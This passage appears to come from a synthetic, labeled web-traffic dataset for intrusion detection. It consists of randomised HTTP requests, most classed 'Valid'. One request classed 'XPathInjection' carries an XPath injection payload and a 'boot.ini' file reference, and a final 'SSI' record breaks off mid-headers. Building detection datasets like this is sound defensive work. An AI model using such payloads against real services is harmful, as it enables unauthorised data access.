Upgrade: zo0jhs/9.3, IJs3au/5.6, dAmeer/2.8
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 625088294062
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ne14twm3mhe8s=rWB@ahmRz&SC6yX=ram2n&heorme=ecOqQW&le5je=4427363&roonta9eul8ses=slT6era0_

End - Id: 7872
Start - Id: 34529
class: Valid
PUT /umWjs9HXLUNIB/56-n6U15/ospK4cyg/vY/2snher98ii.pl? HTTP/1.0
Content-Length: 139
Content-Language: thbtlNL
Content-Encoding: compress
Content-Location: http://dlElrz.fr/tefomahc.asmx
Content-MD5: Y2VjSG56b3Joc2Jla2F0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Oct 06 01:23:41 UTC
Last-Modified: Wed, 27 Dec 06 19:51:50 CET
Host: 68.223.120.241
Connection: keep-alive
Accept: video/quicktime;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=6571
Client-ip: 217.109.107.241
Cookie: hio9nruheku1=dn;hpee0no=rtOtmwincecoca;p5mochafH=l/loge|Ins)replacemtdtsw ea;eti=on7@;or9hindz2iit44=1
Cookie2: $Version="5"
Date: Wed, 28 Apr 10 15:08:37 GMT
ETag: W/"n1GDhvFvyRM_WoHn1"
Expect: emdeywl
From: aiiTbdt@stretps.it
If-Modified-Since: Wed, 14 Mar 07 23:57:14 UTC
If-Unmodified-Since: Tue, 14 Aug 07 11:50:47 UTC
If-Match: "yupLnJX3P2f6Xf_V5O7h"
If-None-Match: "8u2yfWDM_H2.bP57z"
If-Range: Wed, 19 Oct 05 14:56:14 GMT
Max-Forwards: 67
MIME-Version: 9.2
Pragma: i='5h7erzp'
Proxy-Authorization: Basic ZVMyZ2F0OnN1cnRldmN5
Authorization: NTLM YWlzZTBldGlzcHVld250T2loZWlvbG9paVllamk5cGVuaGxzeW4=
Range: 934-
Referer: http://tip7.org/andtun/rjr1sn/mEyrcupr.swf
TE: gzip;q=0.8,trailers,trailers
Trailer: Via
User-Agent: Mozilla/3.4 (compatible; Konqueror/6.2; Win98; wfeai; wwlhhn; hfrtLH)
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 066x785
Via: 1.0 32.51.156.48, pcMaeg/8.6 40.167.31.26
Transfer-Encoding: identity
Upgrade: sohlr6/8.1, elspd0/9.9
Warning: 499 24.172.147.164 "idoo6ex7lm" "Fri, 25 Mar 05 19:19:41 CET"
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4erhbnnt=disYH8B&euumarieniq3u4s=hrd2rDKh&NfHFV=rO4s4A7Vs&0dX2H=neposghal&yoiydbtso8ahp=~tb~&Oule6r=0vo)&iEoi8ro6asheec=icna]iswtnL

End - Id: 34529
Start - Id: 4297
class: Valid
PUT /ic/oetn8ogtth/oXsQ4Lg@6-s/l@V8Sy/ibj/gJN@DKDU/iqDBgN8k.1UBB4k3/dhKNIuatTek/0yx0wwp-PtK.MM/eZE.gif? HTTP/1.0
Content-Length: 246
Content-Language: mate01Vr,tDoTrh,taef
Content-Encoding: compress
Content-Location: http://www.3skdeA.net/1yltl.ace
Content-MD5: Z292aW90ZWVlYWRtb2VvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 10 01:40:58 UTC
Last-Modified: Sat, 28 Oct 06 09:42:56 GMT
Host: www.ohepbmw.gov:70
Connection: close
Accept: application/postscript;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.8, gzip, compress, deflate;q=0.8, deflate
Accept-Language: *
Cache-Control: min-fresh=22
Client-ip: 15.135.42.57
Cookie: saeAawget0aK4O=nhoeTxic:nfromw
Cookie2: $Version="33"
Date: Wed, 29 Aug 07 06:22:00 UTC
ETag: W/"wQldDw@IFnBLoOH1Dwk"
Expect: 0taan=mfei;nrartr
From: hniryitt@cesrtata.de
If-Modified-Since: Thu, 20 Jan 05 19:56:12 CET
If-Unmodified-Since: Sat, 29 Jul 06 16:26:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 842
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="tNt9auq"
Authorization: Basic aWNqaTozZWwyaW9udg==
Range: 695-
Referer: http://a33yoc.org/UwMoc/ecsgiged/cyqnmil/51qc46/e6efn1.sh
TE: chunked
Trailer: From
User-Agent: whuevleqei (sbHxHJGF_h)
UA-CPU: Sparc
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x229
Via: 9.0 www.arrrsh4.js
Transfer-Encoding: deflate
Upgrade: Unh/4.4
Warning: 355 124.140.178.141 "etawMcbaeeisSIpeea" "Thu, 23 Nov 06 12:50:35 CET"
X-Forwarded-For: 132.110.249.171
X-Serial-Number: 41906
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s8=no&8mnp= sDy&punsmi=6169&tbn=tqi&6Jevalu@3h2qI1I=Esirxceatswepb&H-5Hi@=rFkOaOsfG&eLo22Dhs=F%tn3mTz&voHp=pgbhNhyecatr&el=oUde6levGmR8&Techok.XFRWHS=rPhONNwA96z&ncn=iqq&c2=neaoemochaeohb&Ns7qkad=winntUrvarl%D6h&3ecX2mLo=havingm1KtooqbKa2k:

End - Id: 4297
Start - Id: 31230
class: Valid
GET /sn/eva/oiA@@mM3l2Xadwcdb/logeoOMI.z/dio5rahrnopect/Z_MTh2L/iqH/n0GrWf/tcEzJkdz_.Q8/j5nty/r9ulH.mdb? HTTP/1.1
Host: www.8cuzl.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 126.82.213.147
Cookie: rd=47603;aWuEBTax=iotvtk'lnir:Eb5;B9K5htacces=6
Cookie2: $Version="812"
Date: Tue, 22 Feb 05 24:09:04 GMT
ETag: "p6U3X9YloCEwHrpLHSM"
Expect: 100-continue
From: DsosoD@ehto0.fr
If-Modified-Since: Sun, 27 Aug 06 06:08:35 CET
If-Unmodified-Since: Tue, 05 Oct 04 10:29:17 GMT
If-Match: *
If-None-Match: "GKj26zbEummKavhJdgET"
If-Range: Fri, 23 Dec 05 24:48:15 GMT
Max-Forwards: 6044
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: Basic Y096b3Rjc046ajg4ZW1oOXU=
Range: 835058-581
Referer: http://lo0lp.net/fAet/adIaayrt/1rtpYt.htm
TE: deflate;q=0.7
Trailer: Proxy-Authorization
User-Agent: rsne8im/7.0
UA-CPU: StrongARM
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 139x604
Via: erf/0.1 45.43.30.37
Transfer-Encoding: gzip
Upgrade: 8eraih/9.0, cSng/1.4, eiur/4.9
Warning: 470 www.PmqSon.tiff "etyxjzn" "Sat, 18 Jul 09 18:15:29 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 65900782326
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31230
Start - Id: 11175
class: Valid
GET /Etrsmoakei/e1GtGi/NTMdeletejrcp2KQ4FsiU2/ihgLsdbisr/oarzAhe/1QtpY.tiff? HTTP/1.1
Host: www.eleiSonoh.st:86
Connection: keep-alive
Accept: video/mpeg, audio/*, image/jpeg
Accept-Charset: koi8;q=0.4, iso-8859-9;q=0.2, koi8-r, x-mac-turkish, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 72.157.48.145
Cookie: ns3er2e=are5phd7efE7Eh2trr;PvQHhN=i7nJR
Cookie2: $Version="956"
Date: Wed, 10 Feb 10 24:48:10 CET
ETag: W/"FNh84PSplg7zFNa"
Expect: 100-continue
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Tue, 05 Feb 08 10:37:10 UTC
If-Unmodified-Since: Sun, 22 Apr 07 08:40:47 GMT
If-Match: "Kuchzpuj.czqbdQ"
If-None-Match: "TTdH7sdzwCe5eXH6M0U"
If-Range: Mon, 16 May 05 10:25:12 CET
Max-Forwards: 605
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: nucsre csotd=enlnnuol
Authorization: Digest nonce
Range: 01809-,9808-,-723
Referer: http://www.lpank.fr/tafjsn/eapf/uOzsz/cskms.tiff
TE: trailers,trailers
Trailer: Warning
User-Agent: Zeo55asece/1.8
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: 7hhhHm/7.2 www.ioni4ifA.jpg, HTTP/5.3 76.199.115.64:77
Transfer-Encoding: gzip
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11175
Start - Id: 26782
class: Valid
GET /ixesmo4j1i3hqPeO.htm?ry=nck2k4o&RBFEf_W=6572906&SeiTcvammro=tbzabdnt&ttlraclhm=ie7qndah HTTP/1.0
Host: www.esjlntuAc.ch
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: dbh8swso-o, t-eo, ryERhao-r, ht-ehmr, ta-t
Cache-Control: min-fresh=193
Client-ip: 120.60.149.77
Cookie: eo9e3=eaEornv]iReek
Cookie2: $Version="64"
Date: Wed, 12 May 04 15:57:00 GMT
ETag: "n4QOBY7mlRAI54Zy-x"
Expect: 100-continue
From: 9eMfoo@wXn4t.uk
If-Modified-Since: Sat, 06 Aug 05 20:55:23 GMT
If-Unmodified-Since: Tue, 26 Jan 10 11:08:01 GMT
If-Match: *
If-None-Match: "wCGLgJMuyfJgikPLqK"
If-Range: Wed, 12 Mar 08 15:18:43 UTC
Max-Forwards: 92
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: desDsm geshl54E=ngonva
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: -42,515917-,2250-
Referer: http://nrhsgE.ch/io0ipsbn/mgFhtiai/tsnhqp/joqe4n/onhg2.jsp
TE: chunked;q=0.1
Trailer: From
User-Agent: tttLENGX http://www.ishinn.de
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 358x270
Via: 5.8 www.a2cd.tiff
Transfer-Encoding: identity
Upgrade: coar/9.8
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 51104
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26782
Start - Id: 1103
class: Valid
GET /V3tQkNBDrdGHWE/0tCe4beet81lto/jE/yQyCaHLlte/a2SAiU-KSiz/gkGeR6eqo5iy9w.aspx?ahaaensv=e5ernakm7hci%3CdunionA6o&zofsI=arv_&0insbyeey1aea=wehq&UnI8voaooi=ei9gDeSoa3titshrc&tuQ5g7Lnph-57z=qTeoehsr&Ie9gtlrnouei=1790046928&67Nc=rPNmdr&ag7emhEntIh=79645260&VycS=sdQC6d8.&daEo0uesbr=aainsertl&racteauftt=kutsyisnai&oeBNi0=6669711&ebI7=qahomaildinod HTTP/1.1
Host: 51.232.205.164
Connection: close
Accept: */*
Accept-Charset: cp-932;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: a8-OrnDclat, lesLwg-hmeemor, ayee-dmGrEeL, s-f, anms-inger6
Cache-Control: max-age=1
Client-ip: 249.26.84.16
Cookie: ia3iih7heg1oD=a.NEQZqi;tEmte=590;lxs=986
Cookie2: $Version="48"
Date: Sat, 21 Feb 09 08:13:17 CET
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sun, 24 Jul 05 20:42:46 CET
If-Unmodified-Since: Wed, 19 Sep 07 18:45:22 UTC
If-Match: "aDcV4HzyhcFyo9g1"
If-None-Match: "2rF-p_JGO5oas.sKpa"
If-Range: *
Max-Forwards: 42
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM c3RlY1JudGlvYmVpdGVhcWVkaUVkdHRobnJxZGVtcnRiaW5jaDJkTG90Mg==
Authorization: Basic aXNldHhuanM6bDBoMXNmdQ==
Range: 634551-,48052-6687,-9
Referer: /nopoad.jsp
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 1.3; hn-96; rv:5.3.2) Gecko/25160898
UA-CPU: 68000
UA-Disp: 4228,5087,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 0.8 www.arowo.htm, 2.9 www.dume.js, 9.4 www.trp9esd.shtml
Transfer-Encoding: deflate
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 392 www.m2hZnz.tiff "idliSa9nioaswwetlp" "Thu, 02 Sep 04 23:56:20 CET"
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1103
Start - Id: 29782
class: Valid
GET /rMthrubmoeemhodlao/oincludenhttp2/rwupY.html?OesiYl=3copy9nVreia&o3oLutrmoath=ak4Is.vZ&elnae=485154&rskas6ut98Ixt=58c&iSnbsthma=o%5C&oao6ameISgi=+Uo+p2egestylerfeqp0evalo&Kf.MPHunionWU3m=aGAGZgIJQ HTTP/1.0
Host: www.eOla5wn0o.cz
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1257, x-mac-chinesesimp
Accept-Encoding: *
Accept-Language: f-wz5mLe, 9rgaa-ddtHn
Cache-Control: 1dne7='edpn90'
Client-ip: 66.205.89.103
Cookie: ve=1;tneeemEfetxa=]Itya4=;Dseesaeusre=34
Cookie2: $Version="92"
Date: Sun, 19 Apr 09 16:01:24 CET
ETag: "IX5Xjzs12LEu0kOPUkyM"
Expect: 3afhShae
From: mptr@19anuaa52a.net
If-Modified-Since: Sun, 01 Oct 06 13:42:40 CET
If-Unmodified-Since: Mon, 31 May 04 01:02:42 CET
If-Match: "XomgH1jG_XRnhYc1e_"
If-None-Match: *
If-Range: *
Max-Forwards: 9962
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Oeah
Authorization: 1Ap0r eet09eib=nuPft
Range: -02795
Referer: http://6eoaitth.biz/n9InToes/e0ir/dosghS.wav
TE: trailers,chunked;q=0.1,trailers
Trailer: Accept-Charset
User-Agent: 5qsw/4.6
UA-CPU: Sparc
UA-Disp: 2709,734,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2347x796
Via: HTTP/2.2 206.10.60.59, FTP/4.7 217.14.232.209, so0e/4.9 169.155.222.169
Transfer-Encoding: identity
Upgrade: hoc/9.0, nsaeuh/2.0
Warning: 362 90.215.221.94 "tdttdIet" 
X-Forwarded-For: 7.71.153.105
X-Serial-Number: 92915948163168
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29782
Start - Id: 21876
class: Valid
GET /uoR/b1RzzQ1v/s2tUW.6z4L/osmiPBFXrDE6ZXC8ROy/wfJiaMm0Odelete1/eoMachdenhjnt2re7/scishenln4eho/j2YN7Nn-VBx8GwPjE.php?m2te1=cboir6sr7ietcdle&Yresedeiarqa=ygakwEhL&WrQk=zSd%40aBZ4-WH&Ldpservicesm=8982&t8=7589903&oseec=7050398626&aatems=79&qon=hb5oonsi&ooEotegelnarnun=3&s6lrshOiea1=98&nesno11=70826321&RiFAhJJPTAbG=ma5%3Ahfx%2FpeoDwhereg9&w9a7ivoaedr=eechoe-a-c HTTP/1.0
Host: www.f1nim.gov
Connection: keep-alive
Accept: text/html, image/*, image/*
Accept-Charset: windows-1254, windows-1255, x-mac-chinesetrad;q=0.1, x-mac-greek;q=0.6, x-mac-ce
Accept-Encoding: 
Accept-Language: yb9jesu-5;q=0.3
Cache-Control: max-stale=597
Client-ip: 124.23.154.34
Cookie: st=1;cksonutle2wqnnq=63;lnnAbtxqniretd=tl
Cookie2: $Version="53"
Date: Sat, 20 Jun 09 16:43:08 GMT
ETag: "fyqs5Qx@yMaGeCdjwq"
Expect: Idr4oo=neMZhs;hco8c4ez=Ri9apu3l
From: gspde@ia3eGzume.be
If-Modified-Since: Thu, 15 Jul 04 04:15:08 GMT
If-Unmodified-Since: Tue, 12 Feb 08 24:56:00 CET
If-Match: "6B.uch8-Bf3hwKJGE"
If-None-Match: "fc.vSaKu5P3Ei6hh.O"
If-Range: "5Meqdj9eimp2KmKwN"
Max-Forwards: 17
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: fn3A oquea=azen
Range: -34244,001-
Referer: http://webm.com/toa5a/suingobh/loyfte/1ga5n/iat8.sh
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/5.1 (Windows; U; Win98 1.7; si-aa; rv:7.9.2) Gecko/72951211
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5382x0739
Via: 9.3 www.igHcpt.png
Transfer-Encoding: Sahwoe; F3euil=i0dn
Upgrade: foarn/6.0
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21876
Start - Id: 4979
class: Valid
POST /z16fmNgTST_9myVnR/df-.KIQ4IVXrs/-e/8L8L-Kw_1/I6/lezfFRdiAsu4Dwb/12P.php3? HTTP/1.0
Content-Length: 249
Content-Language: Etzn9
Content-Encoding: compress
Content-Location: http://www.pinIsd.gov/bidir/ie6enrcn.asp
Content-MD5: ZmFvaG1pYWVlM1BJc0J1aw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Jul 05 17:59:10 CET
Last-Modified: Sun, 27 Sep 09 02:09:50 CET
Host: www.a3ooNir.de:80
Connection: keep-alive
Accept: application/*, text/plain
Accept-Charset: iso-8859-2;q=0.5, big5, gb2312;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: culAn1-Tei;q=0.7, 0-i5ys;q=0.0
Cache-Control: only-if-cached
Client-ip: 105.202.185.52
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="1"
Date: Sun, 16 Jan 05 21:36:52 UTC
ETag: "E6Q_HzRmW4MH.Tv2NR-"
Expect: jtdRSzw=syia
From: zqhtasa7@rsaljt.it
If-Modified-Since: Tue, 29 Sep 09 01:00:18 GMT
If-Unmodified-Since: Sat, 26 Sep 09 01:14:25 CET
If-Match: *
If-None-Match: "fG-LSAqeWA5fXzEW7_.n"
If-Range: Fri, 08 Oct 04 22:29:55 CET
Max-Forwards: 238
MIME-Version: 8.6
Pragma: brtaje='nBw'
Proxy-Authorization: re1s oeyla=tamzuv0w
Authorization: NTLM cnJlb2Vrbm5iZXRuZWxvbGM3dG1ybWNuaWJmNXRhZTRubWdlb2V0ZGQ=
Range: -6861,11-204609
Referer: http://www.eceri5j.net/dAc7zii1/rjswe/lott.htm
TE: trailers
Trailer: From
User-Agent: c8nWcdsen (gCuuj61HLm; d8L1W._SC; xnCdTSr; eetqtN; m@Bch4dma)
UA-CPU: 68000
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: HTTP/9.7 112.7.88.192
Transfer-Encoding: identity
Upgrade: coejsr/9.9
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 99.65.168.34
X-Serial-Number: 3100317318115604683
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

98Gkpb8Kphp3v=an2hdeFNeei&2pQuHXexecAysEM=nwlrS&wst=rdl&ns=<Ep8%c:&hnr=52&oe=9834597840&et=80&du=eoceiihhyklenee&p91vE_bGCSg=t48uS9ipsnsnao&e4erhldss=rvCfnJK&hontH=ateanmhN&tdNsS4Foc=tuney&chTSPg= e?OnceFRy&eo9eswbeTndebr=Rei W&HWzsj1Q=ctiea

End - Id: 4979
Start - Id: 14272
class: Valid
GET /T7JcSqMk/iqTNH4j6sQ/otelnetllL3.gif?tedenmei=ie HTTP/1.1
Host: 174.200.236.6
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-jp;q=0.7, euc-cn, x-mac-icelandic, euc-jp;q=0.5
Accept-Encoding: compress;q=0.5, identity;q=0.0
Accept-Language: Ttzr7-noo, iLh-m3ahu, sAtLohyu-b6wl
Cache-Control: max-stale
Client-ip: 32.236.217.55
Cookie: m2eheeoeono3hr=eQbp0mS;poeuan=hishbsrroSr4urE;ejeit=inoa
Cookie2: $Version="960"
Date: Tue, 17 Jul 07 02:04:12 UTC
ETag: "MsMPrJNM44hZ_6."
Expect: lbei=otDwIx
From: rhaheh@nsnh.ch
If-Modified-Since: Thu, 21 Sep 06 18:07:32 UTC
If-Unmodified-Since: Fri, 13 Nov 09 05:56:38 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Apr 05 08:16:23 CET
Max-Forwards: 1581
MIME-Version: 7.4
Pragma: xGzwvn=5frmbvte
Proxy-Authorization: yTotsr iaoreos=CaathcdY
Authorization: NTLM ZVNwYmwzNW9sbHRDdGk4bmdwcmI5b2loUHVoZWVvbG10YW9laEFteWFjdA==
Range: 690218-443212,-16920,80-2
Referer: /2sat1eG/nsnw/oFTneqi/h1h1wo/ienoAn.css
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.4 (compatible; Konqueror/5.8; SunOS sun4u; eeuE; Tsie; uaoe)
UA-CPU: 68000
UA-Disp: 2772,8077,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 532x085
Via: FTP/6.2 www.hs0Tvka.shtml:903, 8.3 173.142.255.242, 7.4 73.98.210.11
Transfer-Encoding: identity
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 462 www.aBmiee.shtml:39 "gspth" 
X-Forwarded-For: 235.126.58.179
X-Serial-Number: 4359426
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14272
Start - Id: 35563
class: XPathInjection
PUT /d.QWMFMkFzX/tiBWKefkqCDL7/sHD/kKK3nb@Hiit0Os/l0emheu1fte/ohL/fB-JZrj8SX/wprhi9tb1g/ms.dll? HTTP/1.0
Content-Length: 310
Content-Language: fenSoni
Content-Encoding: identity
Content-Location: /7wie/ea0fyg8l/iiaSve/n8cme.mdb
Content-MD5: QUVvOHdlaWFFN0F0ZHpUOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Sep 09 19:00:17 GMT
Last-Modified: Sun, 17 Apr 05 16:56:36 GMT
Host: 250.115.155.194:9676
Connection: kegosl
Accept: video/*;q=0.2
Accept-Charset: iso-8859-15, iso-8859-3, cp-936;q=0.3, windows-1250;q=0.8
Accept-Encoding: *
Accept-Language: i-seily, pfat-idletccn;q=0.1
Cache-Control: min-fresh=02
Client-ip: 91.74.181.149
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="43"
Date: Mon, 19 Jun 06 02:17:46 CET
ETag: "m1ywXFmb1x6W1DZs"
Expect: 100-continue
From: wp5sjfh@o8nst.uk
If-Modified-Since: Sun, 11 Jun 06 06:41:01 CET
If-Unmodified-Since: Sun, 26 Jun 05 09:16:23 GMT
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 35
MIME-Version: 5.3
Pragma: ghnAvt9=dren9
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: n2ni t7rOda=rkoT
Range: -1,-1839
Referer: http://www.dz0hwjl.de/ijsmnaes/mmluvt.tar.gz
TE: deflate;q=0.5,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.6 (compatible; MSIE 3.2; Windows NT; errezbtOx)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 174x8533
Via: 6.0 www.zDnedde.htm
Transfer-Encoding: compress
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 111 66.147.23.225 "Ce1Nw" "Thu, 19 Mar 09 19:56:10 UTC"
X-Forwarded-For: 219.76.123.80
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6deleteaaww=bgsounde&eyn3=ehi$&VihtfmsE=dlmwmr'    or   yzp/eor/child::node()[processing-instruction()=5]    or   'my'   =   '&u3tavueeaala8N=gkimZxR&imgC6WL1A_C=34&Ea9cOafZuc=170&vsmw=oJec6h6y&l1ocoT0ocrmqth=]boot.iniry&tauasw3gytdaaie=hao6F&crolsanhanEo=54178920&roT=40597

End - Id: 35563
Start - Id: 4024
class: Valid
POST /orYGt0wZErvB.asmx? HTTP/1.0
Content-Length: 216
Content-Language: atse,7sm37iy,oe
Content-Encoding: identity
Content-Location: /tcwsb2t/dhzez5/erv5/sieiaY/uletptm.doc
Content-MD5: bWFlZWVvc21udGF0dWR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Dec 08 02:55:44 GMT
Last-Modified: Wed, 10 Oct 07 12:06:53 UTC
Host: www.ersen5ie.gov
Connection: close
Accept: text/*, text/*;q=0.5, audio/x-wav;q=0.3
Accept-Charset: iso-2022-kr, hz-gb-2312;q=0.6, iso-8859-4, windows-1258, utf-7;q=0.0
Accept-Encoding: compress;q=0.8, identity;q=0.6
Accept-Language: *;q=0.4
Cache-Control: min-fresh=9
Client-ip: 238.138.165.155
Cookie: ient=3602;cyeaskit1eD=93584900;4dgtew=946
Cookie2: $Version="9"
Date: Thu, 24 Apr 08 18:36:43 UTC
ETag: W/"Pfij4Ikho0YboWjeNmon"
Expect: 100-continue
From: 6tEis86e@psboelOfr.cz
If-Modified-Since: Sun, 11 Dec 05 09:29:08 GMT
If-Unmodified-Since: Fri, 07 Jul 06 24:52:31 UTC
If-Match: "lZ_1f9@YREpjBK5cg"
If-None-Match: *
If-Range: Wed, 18 Feb 04 13:25:02 CET
Max-Forwards: 0222
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: Basic YmdzTlI6WWU3ZWRm
Range: 8564-,52-
Referer: http://dkei6hy.fr/earste.php4
TE: deflate,trailers
Trailer: Trailer
User-Agent: esra/4.9.7.8.6
UA-CPU: 68000
UA-Disp: 055,684,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 242x137
Via: 3.9 www.iiay.htm, 9.9 86.48.72.44
Transfer-Encoding: deflate
Upgrade: oeLob/1.5, p4rvo/8.7, r8nc/7.6, akd/5.3, Oa6eds/9.9
Warning: 071 www.ltyape.jpeg "tniteaGmssEneesyn" "Sat, 05 Aug 06 23:28:04 CET"
X-Forwarded-For: 201.143.193.53
X-Serial-Number: 198262
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~

XneSform=thweM1mt&orpa=23985860&nlgelaudqkie6ww=hThu&ritNm=t6trssuakeer&oiqjniStE=68&7uZXom=6j&VREe=5&.tIAyJg=?nmttnAobject[&trhgebd=1167153320&afTer6ribEa=0l&nerl30t=sfPma7rerthzAmfo&0vpl=iq&68ha=dehktcEFwddlrcr

End - Id: 4024
Start - Id: 40234
class: SSI
GET /eB97/tBq5K-5O7j/zmr1knwmrsc1nHius/n_ovXHz9O8DmG/OIZMva/tchy/eEORHXUd2.htm?ei09stoCaewXj3e=oB&yielg=njfTwmDa&GwHpfWtmpW=jeoxnkqjui&es0c=Oeabetween&home7ws=nmRxearahn&eoetoqenalDnt=079079 HTTP/1.1
Host: 48.156.185.171:0
Connection: u0dehG
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: m-hseh2ds, mtyler-r7i, p-coe8, odlsce-pne;q=0.9
Cache-Control: no-cache
Client-ip: 201.49.47.11
Cookie2: $Version="36"
Date: Sat, 08 Apr 06 05:47:11 GMT
If-Modified-Since: Sat, 03 Jan 09 13:42:42 CET
If-Unmodified-Since: Mon, 01 Nov 04 08:11:19 CET
If-Match: *
If-None-Match: *
Proxy-Authorization: NTLM Z3llakRyM3Vjcm42cnl0ZEh0bnRidnVuaHVvczBubG5ldHliZHVS
Range: 24419-8,26976-174670,50232-
Referer: http://t0okob.it/AutedFnd/aiumb/Rrsql5.cfm
